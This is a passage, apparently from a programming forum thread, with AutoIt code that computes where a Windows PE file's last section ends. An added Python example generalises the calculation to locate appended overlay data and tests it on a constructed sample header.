    Local $NofS      ; NumberOfSections
    Local $fin_I_S_H ; end of the IMAGE_SECTION_HEADER table

    ; read the file and load the buffer (16 = binary mode; headers must fit in 1000 bytes)
    Local $hfile = FileOpen($file, 16)
    Local $binary = FileRead($hfile, 1000)

    ; offset of IMAGE_NT_HEADERS (PE signature); BinaryMid is 1-based
    $LFvalue = BinaryMid($binary, $l_fanew + 1, 4)
    $LFvalue = Dec(OLE(StringReplace($LFvalue, "0x", "", 1, 0)))

    ; NumberOfSections
    $NofS = $LFvalue + $PEsize + 2
    $NofS = BinaryMid($binary, ($NofS + 1), 2)
    $NofS = Dec(OLE(StringReplace($NofS, "0x", "", 1, 0)))

    ; SizeOfOptionalHeader
    $Size_O_H = $LFvalue + $PEsize + 16
    $Size_O_H = BinaryMid($binary, ($Size_O_H + 1), 2)
    $Size_O_H = Dec(OLE(StringReplace($Size_O_H, "0x", "", 1, 0)))

    $fin_I_S_H = ($LFvalue + $PEsize + $I_F_H + $Size_O_H) + ($NofS * $SizeS)

    ; SizeOfRawData of the last section: 24 bytes before the end of the table.
    ; +1 because BinaryMid is 1-based; OLE() because the field is little-endian.
    Local $RawSize = BinaryMid($binary, $fin_I_S_H - 24 + 1, 4)
    $RawSize = Dec(OLE(StringReplace($RawSize, "0x", "", 1, 0)))

    ; PointerToRawData of the last section: 20 bytes before the end of the table
    Local $RawOffset = BinaryMid($binary, $fin_I_S_H - 20 + 1, 4)
    $RawOffset = Dec(OLE(StringReplace($RawOffset, "0x", "", 1, 0)))

    FileClose($hfile)

    Return $RawSize + $RawOffset

EndFunc   ;==>Get_EOF


; OLE function: "little-endian order" (reverses the byte order of a hex string)
Func OLE($Var)
    Local $len = StringLen($Var) / 2
    Local $Array[$len + 1]
    Local $Char
    Local $A = 1
    Local $Result
    For $i = 1 To $len
        $Char = StringMid($Var, $A, 2)
        $A += 2
        $Array[$i] = $Char
    Next
    For $x = $len To 1 Step -1
        $Result &= $Array[$x]
    Next
    Return $Result
EndFunc   ;==>OLE


Regards, any questions, I'm here :)
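
Both Get_EOF scripts in post 10 return PointerToRawData + SizeOfRawData of the last section header, which is where data appended after the PE image (an overlay) would begin. The following is an added example, not code from the post: it generalises the calculation by taking the maximum over all sections and by reading SizeOfOptionalHeader, so it also covers PE32+ files and section tables that are not ordered by file offset. The function names and the sample file are constructed for illustration.

```python
import struct


class PEFormatError(ValueError):
    """Raised when the buffer does not carry valid MZ/PE headers."""


def pe_overlay_offset(data: bytes) -> int:
    """Return the file offset where section data ends (start of any overlay)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise PEFormatError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise PEFormatError("missing PE signature")
    (num_sections,) = struct.unpack_from("<H", data, e_lfanew + 6)
    (opt_size,) = struct.unpack_from("<H", data, e_lfanew + 20)
    # Section table follows signature (4) + file header (20) + optional header.
    table = e_lfanew + 24 + opt_size
    end = table + 40 * num_sections
    if end > len(data):
        raise PEFormatError("section table runs past end of file")
    for i in range(num_sections):
        # SizeOfRawData at +16 and PointerToRawData at +20, both little-endian.
        raw_size, raw_ptr = struct.unpack_from("<II", data, table + 40 * i + 16)
        if raw_size:
            end = max(end, raw_ptr + raw_size)
    return end


def overlay(data: bytes) -> bytes:
    """Bytes stored after the last section's raw data (empty if none)."""
    off = pe_overlay_offset(data)
    return data[off:] if off < len(data) else b""


def build_sample_pe(sections, opt_size=224, trailer=b""):
    """Constructed test input: headers only, enough for the parser (not loadable).

    sections is a list of (name, PointerToRawData, SizeOfRawData).
    """
    e_lfanew = 0x80
    buf = bytearray(e_lfanew)
    buf[:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, e_lfanew)
    buf += b"PE\0\0"
    buf += struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    buf += bytes(opt_size)
    for name, raw_ptr, raw_size in sections:
        buf += struct.pack("<8sIIIIIIHHI", name, raw_size, 0x1000,
                           raw_size, raw_ptr, 0, 0, 0, 0, 0)
    total = max([len(buf)] + [p + s for _, p, s in sections])
    buf += bytes(total - len(buf))
    return bytes(buf) + trailer


# The last header in the table (.data) is not the section that ends last in
# the file, so a last-section-only calculation would report 0x800 here.
SAMPLE_SECTIONS = [(b".text", 0x400, 0x200),
                   (b".rsrc", 0x800, 0x12000),
                   (b".data", 0x600, 0x200)]

if __name__ == "__main__":
    sample = build_sample_pe(SAMPLE_SECTIONS, trailer=b"APPENDED-CONFIG")
    print(hex(pe_overlay_offset(sample)), overlay(sample))
```
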